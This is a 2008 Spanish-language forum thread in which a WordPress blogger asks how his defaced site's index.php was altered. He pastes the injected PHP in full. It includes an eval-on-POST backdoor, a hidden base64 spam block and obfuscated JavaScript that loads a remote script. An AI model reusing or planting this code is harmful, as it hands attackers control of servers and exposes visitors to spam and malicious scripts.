Ataque, Hackers Turcos a Wordpress 2.6.2

hyperrjas · #1 (**permalink**) 14/09/2008, 12:06

Muy buenas a todos, les comento mi problema:

Esta tarde domingo 14 de septiembre de 2008 han atacado mi blog que no mi web.

Cuando voy a entrar veo un mensaje que ponia hacked by el grupo este que no voy a ni a nombrar, por lo que se ve son turcos, porque sale la bandera turca y la musica. mi blog es www.guitar2000.com/blog

Me he acojonado bastante ya que pense que me habian vaciado el servidor pero no ha sido así por suerte y me he puesto enseguida a hacer copia de seguridad de todo el sitio.

Cuando accedo via ftp para ver el sitio veo que todo está correcto excepto dos archivos:

index.php (este archivo ha sido modificado no se ni como ni de que manera)

- He revisado los permisos de configuracion de los directorios y está todo ok

- Desde el hosting me aseguran que ha sido culpa mia que ellos tienen todas las medidas de seguridad existentes. el hosting es www.ixwebhosting.com

Tambien he movido otro archivo que no se para que servia pero tambien estaba en el directorio que era el index.php.wpau.bak. Contiene un monton de caracteres.

Aquí les dejo el contenido del archivo index.php que no corresponde con el original de wordpress y que me han puesto no se como ni de que manera lo han hecho:

Código PHP:

  <?php 
/** 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define('WP_USE_THEMES', true); 
 
/** Loads the WordPress Environment and Template */ 
require('./wp-blog-header.php'); 
?><?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5SZXNlYXJjaCBEcnVnIE92ZXJkb3NlIG9uZSBvZiB0aGUgbW9zdCBpbnRlcmVzdGluZyB0b3BpY3Mgb24gVmlhZ3JhIHdpbGwgbm90IG1ha2UgeW91ciBwZW5pcyBncm93IGFueSBsYXJnZXIgc28gd2hhdCBleGFjdGx5IGlzIGEgPEEgSFJFRj1odHRwOi8vd3d3LmFuc3dlcmJhZy5jb20vcHJvZmlsZS8/aWQ9MzEwMTY4IHRpdGxlPSdidXkgdmlhZ3JhIG5vIHByZXNjcmlwdGlvbicgVEFSR0VUPV9ibGFuaz5idXkgdmlhZ3JhIG5vIHNjcmlwdDwvYT5QcmVzY3JpcHRpb24gdmlhZ3JhIGxvb2tpbmcgdG8gY29udHJvbCB5b3VyIGVyZWN0aW9uPyBmYW1pbHkgcGhhcm1hY3kgYWZ0ZXIgYWxsIDxBIEhSRUY9aHR0cDovL2ZvcnVtLmx5Y29zLmRlL21lbWJlci5waHA/dT0yNjI4MiB0aXRsZT0nYnV5IHZpYWdyYSBvbmxpbmUnPmdlbmVyaWMgYnV5IHZpYWdyYTwvYT4uIDxCUiAvPgpFcmVjdGlsZSBkeXNmdW5jdGlvbiBleGVyY2lzZXMgcGVvcGxlIHdobyBhcmUgaW50ZXJlc3RlZCBpbiB2aWFncmEgY2lhbGlzIG9ubGluZSA8QSBIUkVGPWh0dHA6Ly93d3cueW91dHViZS5jb20vdHJheHRlbmJlcmc1NTUgdGl0bGU9J2NoZWFwIGdlbmVyaWMgdmlhZ3JhJz52aWFncmEgYmVzdCBidXk8L2E+LiA8QlIgLz4KCjxzY3JpcHQ+aWYodHlwZW9mKHlhaG9vX2NvdW50ZXIpIT10eXBlb2YoMSkpZXZhbCh1bmVzY2FwZSgnYHZhfCU3MiQlMjB8JTYxPyxpPyx8XyUzQmElM0R+JTVCQCUyMiQlMzElMzklMzElMkUhJTMxIyUzM2AlMzMiLCIkJTMxYCUzNTd8LmAyJTMwJTMyIn4sIjElMzUlMzglMkU/JTM4QDklMjIkJTJDJTIyfDF8JTM5JTMxYCUyRSUzODQ/JTIyfl07YF8lM0R8MTt+aUBmJTI4ZG9jdW0lNjUhbkB0JTJFI2MlNkZAJTZGfCU2QiU2OWVgLiU2RCQlNjEjdCU2MyQlNjglMjglMkYhJTVDYGJoYCU2NyU2NiU3NH4lM0QhMS8pPz1+JTNEPyU2RT91JTZDJCU2Q0AlMjkkJTY2JTZGP3IlMjh8JTY5JCUzRCUzMCUzQiU2OT8lM0MkJTM0Pzt+JTY5KyMlMkI/JTI5JTY0b2N+dW0kJTY1JTZFYHQud3IlNjl0JTY1KCUyMmAlM0NAJTczYyU3MmklNzBgJTc0JTNFJTY5YCU2NiMlMjhfJTI5ZCU2RiU2M3U/bSU2NSU2RXwlNzR+LnckJTcyJTY5JTc0JTY1Pyh8JTVDYCJ8JTNDfHMlNjM/ckBpcEAlNzQkJTIwfmkkJTY0JTNEJTVGYCIrQCU2OSMrJTIyX0AlMjAlNzNyPyU2M3wlM0Q/JTJGL34lMzd+NiUyRTElMzZgJTMzLiMlMjJAKyU2MUBbJTY5fF1gK3wiYC9+YyElNzAlMkZAJTNFJTNDYCU1QyU1QyUyRnNjJTcyYGklNzBAJTc0ISUzRSU1QyJ+JTI5JTNDJTVDfCUyRnMlNjMlNzJpcCN0QCUzRUAlMjIpIyUzQicpLnJlcGxhY2UoL0B8XCR8fnwjfFwhfGB8XHx8XD8vZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7PC9zY3JpcHQ+PC9kaXY+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Como podeis ver han agregado unas lineas de codigo al index.php original.

Mi pregunta es si existe un fallo importante de seguridad en wordpress 2.6.2 y como han podido escribir en mi index de wordpress ya que he tomado todas las medidas de seguridad posibles habidas y por haber, incluso tengo el wordpress en https.

Muchas gracias espero su respuesta. Un saludo

wolf-R · #2 (**permalink**) 27/09/2008, 07:00

Joder estamos apañados con esta gente... bueno quien sabe alomejor tenian buenas intenciones, y ha sido como un aviso para que revises la seguridad de tu blog.

De todas formas ante estas cosas no se que medidas se pueden tomar para que no vuelva a ocurrir, supongo que solamente esperar a q Wordpress siga arreglando bugs en futuras versiones.

Saludos